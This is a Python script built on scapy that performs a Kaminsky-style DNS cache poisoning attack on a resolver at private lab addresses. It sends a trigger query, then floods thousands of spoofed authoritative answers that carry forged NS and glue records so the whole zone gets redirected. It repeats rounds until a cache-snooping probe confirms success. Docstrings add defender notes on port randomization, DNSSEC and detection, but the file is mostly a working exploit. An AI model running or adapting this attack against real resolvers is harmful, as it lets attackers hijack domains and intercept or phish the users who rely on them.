- import logging
- logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
- from scapy.all import *
- import scapy.sendrecv
- scapy.sendrecv.wrpcap = wrpcap
- import string
# Lab addressing (RFC 1918 range).
victim = "10.17.27.3"      # resolver whose cache the script targets
proxy = "10.17.27.1"       # address the forged answers claim to come from
                           # NOTE(review): presumably the victim's upstream server - confirm
spoof_ip = "10.17.27.2"    # address written into the forged A records

# Zone named in the forged NS record and probed by is_poisoned().
poison_domain = "8bdf8e08a4c23aa89ff21690db4cc29b4c04577a2f18e129"

dns_port = 53

# Forged answers are addressed to this one UDP port, so they can only match a
# resolver that sends its upstream queries from a fixed, known source port.
# Per-query source-port randomization (RFC 5452) removes that assumption.
query_source = 9999

# Forged answers per round, one per transaction ID in 0..no_of_packets-1.
# The DNS ID field is 16 bits wide, so 4000 IDs cover about 6% of the space.
no_of_packets = 4000

# TTL on every forged record: 86400 seconds = 24 hours.
time_to_live = 86400
def poison():
    """Run one round against `victim` and return the random label used.

    A recursive query (rd=1) for a fresh 8-character label under
    `poison_domain` is sent to the victim. It is followed by
    `no_of_packets` forged authoritative answers, sourced from `proxy` and
    addressed to UDP port `query_source`, one per transaction ID.

    Each forged answer carries an A record for the random name, an NS record
    for `poison_domain` itself, and an additional A record for
    'ns.' + poison_domain. The last two are what would redirect the whole
    zone if one answer were accepted.

    Defender notes: the round depends on a fixed resolver source port and on
    unvalidated answers. Source-port randomization (RFC 5452) and DNSSEC
    validation address those two conditions. On the wire a round appears as
    thousands of responses to one outstanding query, nearly all with
    non-matching transaction IDs.
    """
    charset = string.ascii_lowercase + string.digits
    rng = random.SystemRandom()
    prefix = ''.join(rng.choice(charset) for _ in range(8)) + '.'

    target_name = prefix + poison_domain
    ns_name = 'ns.' + poison_domain

    # Trigger: makes the resolver start an upstream lookup for a name that
    # cannot already be in its cache.
    query = (
        Ether()
        / IP(dst=victim)
        / UDP(sport=1337, dport=dns_port)
        / DNS(id=1337, rd=1, qd=DNSQR(qname=target_name))
    )

    # Passing a list as `id` makes scapy expand this into one packet per
    # transaction ID when the packet set is written out.
    forged_dns = DNS(
        id=range(no_of_packets),
        qr=1,
        rd=0,
        ra=0,
        aa=1,
        qd=DNSQR(qname=target_name),
        an=DNSRR(rrname=target_name, type='A', ttl=time_to_live, rdata=spoof_ip),
        ns=DNSRR(rrname=poison_domain, type='NS', ttl=time_to_live, rdata=ns_name),
        ar=DNSRR(rrname=ns_name, type='A', ttl=time_to_live, rdata=spoof_ip),
    )
    answer = (
        Ether()
        / IP(src=proxy, dst=victim)
        / UDP(sport=dns_port, dport=query_source)
        / forged_dns
    )

    # The answers go to a temporary pcap so tcpreplay can replay them;
    # sendfast() deletes the file afterwards.
    poisoned_packets = get_temp_file()
    wrpcap(poisoned_packets, answer)

    print("Poisoning...")
    sendp(query, verbose=0)
    sendfast(poisoned_packets)
    return prefix
def is_poisoned():
    """Report whether `victim` answers for `poison_domain` without recursing.

    Sends a query with rd=0 and returns True when the reply has exactly one
    answer record. A resolver asked not to recurse typically answers only
    from its cache, so a hit suggests a record for the zone is cached.

    Defender note: rd=0 probes from clients are the cache-snooping pattern.
    Restricting which clients get cache-only answers removes this check.

    The reply from sr1() is indexed without a None check and no timeout is
    passed.
    """
    probe = (
        IP(dst=victim)
        / UDP(sport=1337, dport=dns_port)
        / DNS(id=1337, rd=0, qd=DNSQR(qname=poison_domain))
    )
    response = sr1(probe, verbose=0)
    answer_count = response[DNS].ancount
    return answer_count == 1
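def sendfast(x, iface=None):
    """Replay the pcap file at path *x* with tcpreplay, then delete the file.

    Args:
        x: path of the pcap file to replay. It is always unlinked before
            returning, whether or not the replay succeeded.
        iface: interface name to pass to tcpreplay. Defaults to scapy's
            `conf.iface` when None. The original overwrote this argument
            unconditionally, so it was silently ignored.

    Errors from starting or running tcpreplay are logged via
    `log_interactive` and not re-raised. KeyboardInterrupt is logged and
    swallowed too.
    """
    if iface is None:
        iface = conf.iface

    # argv is a list and no shell is involved, so neither the interface name
    # nor the file path is subject to shell interpretation.
    argv = [conf.prog.tcpreplay, "--intf1=%s" % iface, "--topspeed", x]
    try:
        # The context manager closes the devnull handle even when
        # check_call raises; the original leaked it on that path.
        with open(os.devnull, 'w') as devnull:
            subprocess.check_call(argv, stdout=devnull, stderr=devnull)
    except KeyboardInterrupt:
        log_interactive.info("Interrupted by user")
    except Exception as e:
        log_interactive.error("while trying to exec [%s]: %s" % (argv[0], e))
    finally:
        os.unlink(x)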
# Driver: repeat rounds until the cache probe reports a hit, then print the
# random label used in the round that preceded the hit. There is no round
# limit and no delay between rounds. A targeted resolver would therefore see
# a sustained stream of bursts, each tied to a lookup for a new random label
# under the same zone.
while True:
    subdomain = poison()
    if not is_poisoned():
        continue
    print("subdomain: " + subdomain)
    break